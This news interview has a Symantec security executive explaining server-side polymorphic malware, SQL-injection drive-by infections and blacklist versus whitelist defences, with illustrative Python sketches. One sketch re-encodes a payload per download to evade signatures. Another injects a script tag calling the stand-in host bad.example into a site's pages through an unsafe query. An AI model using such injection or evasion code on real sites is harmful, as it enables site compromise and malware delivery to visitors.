Blacklists, whitelists and heuristics: Symantec describes new threats

iTnews talks to Vincent Weafer, VP Security Response, Symantec, about how server-side polymorphism is changing the security landscape.

Weafer said the threat landscape has changed significantly over the past 18 months.

“There are two major changes,” said Weafer. “One is the increasing degree of complexity of the threats. The other is the massive volume of new threats coming out. Instead of seeing one virus and its effects, now we’re seeing one to two million new threats a month.”

Weafer said this is due to server-side polymorphism: viruses that are altered on the server so that every downloaded copy is different.

“Imagine if you’ve got a piece of malicious code on a server. You can chop and change it every time a new person comes to the website. We’re talking about Trojans more than anything else.”
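
To make the mechanism concrete, here is a minimal sketch of the idea in Python. Everything in it is invented for illustration (a real kit would serve a decoder stub rather than a bare key), but the effect is the same: one underlying payload produces a differently fingerprinted file on every request.

```python
import hashlib
import os

# Stand-in for the malicious payload a compromised server would host.
PAYLOAD = b"same underlying malicious logic every time"

def polymorphic_copy(payload: bytes) -> bytes:
    """Re-encode the payload with a fresh one-time XOR key per download."""
    key = os.urandom(16)
    encoded = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    # A real kit would prepend a decoder stub; shipping the key alongside
    # the body keeps the sketch honest about how the bytes stay recoverable.
    return key + encoded

# Two "downloads" of the same malware no longer share a signature:
print(hashlib.sha256(polymorphic_copy(PAYLOAD)).hexdigest())
print(hashlib.sha256(polymorphic_copy(PAYLOAD)).hexdigest())
```

Because the bytes differ on every request, a signature captured from one victim's download never matches the next one.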

Instead of blocking one or two new viruses each day, Symantec’s systems now blacklist 10,000 to 20,000 new threats every day: ‘exponential growth’ in the problem compared with two to three years ago.

“The typical scenario for a user getting infected today goes like this. The bad guys have scanned websites and found a vulnerable web server: an ordinary website that contains scripting. It could be a travel site, a downloads site or a small business, for example.

“A malware writer attacks the site with an SQL injection, or exploits other vulnerabilities to get their malware onto the site. When users browse the site, they’re exposed to the exploit. They might download data onto their machines. This creates a pathway to download tonnes of stuff – botnets, keyloggers, software updates – limitless information can now be downloaded onto that machine.”
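
The SQL injection step Weafer describes can be sketched in a few lines of Python. The table, the domain and the sqlite3 backend are all hypothetical stand-ins (executescript simulates a database that accepts stacked queries); the point is that a request parameter pasted straight into SQL text can rewrite the site's own pages to serve the attacker's script.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    "CREATE TABLE pages (id INTEGER, body TEXT);"
    "INSERT INTO pages VALUES (1, 'Welcome to our travel site');"
)

def render_page_unsafe(page_id: str) -> list:
    # The request parameter is pasted straight into the SQL text.
    # (executescript stands in for a backend that allows stacked queries.)
    conn.executescript(f"SELECT body FROM pages WHERE id = {page_id};")
    return conn.execute("SELECT body FROM pages").fetchall()

# A crafted "id" parameter appends the attacker's script tag to every page:
evil = ("1; UPDATE pages SET body = body || "
        "'<script src=//bad.example/x.js></script>'")
print(render_page_unsafe(evil))

def render_page_safe(page_id: str) -> list:
    # Parameterised query: the input is only ever treated as a value.
    return conn.execute(
        "SELECT body FROM pages WHERE id = ?", (page_id,)
    ).fetchall()
```

Every later visitor to the "travel site" now silently fetches the injected script, which is the exposure point in the scenario above.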

Because these viruses morph every time they’re downloaded, they can be nearly impossible to predict.

“Server-side polymorphism creates literally millions of threats a month. This requires a totally new approach to security,” said Weafer.

Whitelisting, blacklisting and heuristics

The traditional model of internet security involves blacklisting, said Weafer: creating a list of undesirable sites that are automatically blocked at the user’s end.

“The problem with blacklisting is that there are millions and millions of sites,” said Weafer.

“It’s easy to blacklist the top 50 per cent. But once you get to the long end of the tail, there’s little knowledge about these sites and there are millions that you need to try and block.”
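
As a sketch of why that breaks down, here is the blacklist model in a few lines of Python (the domains are invented): anything not yet on the list is allowed by default, so every brand-new or long-tail site sails through.

```python
# Hypothetical domains; a real blacklist holds millions of entries and,
# as Weafer describes, churns by the tens of thousands daily.
BLACKLIST = {"bad.example", "malware.example"}

def allowed_by_blacklist(domain: str) -> bool:
    # Default-allow: anything not yet known to be bad gets through, so
    # the long tail of unknown sites is the model's blind spot.
    return domain not in BLACKLIST

print(allowed_by_blacklist("bad.example"))        # False: known-bad, blocked
print(allowed_by_blacklist("brand-new.example"))  # True: unknown, allowed
```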

Whitelisting – creating a list of trusted sites – is a different approach to the problem.

“Whitelisting is often brought up as the magic pill,” said Weafer. “Whitelisting’s been around for a long time, and it’s only being leveraged by a small number of people – governments and financial services, for example. If you’ve got a controlled environment then you can keep it secure.

“We’re already using whitelisting to augment our behavioural protection. One of our goals is to build the world’s most comprehensive whitelist.”
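
The contrast with the blacklist sketch above is simply a flipped default. Again the domains are invented for illustration: a whitelist denies everything it does not already trust, which is workable in a controlled environment and much harder on the open web.

```python
# Hypothetical domains; the trusted list is short by design.
WHITELIST = {"intranet.example", "payroll.example"}

def allowed_by_whitelist(domain: str) -> bool:
    # Default-deny: only pre-approved sites get through, which suits the
    # controlled environments (government, financial services) Weafer cites.
    return domain in WHITELIST

print(allowed_by_whitelist("payroll.example"))    # True: trusted, allowed
print(allowed_by_whitelist("brand-new.example"))  # False: unknown, blocked
```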
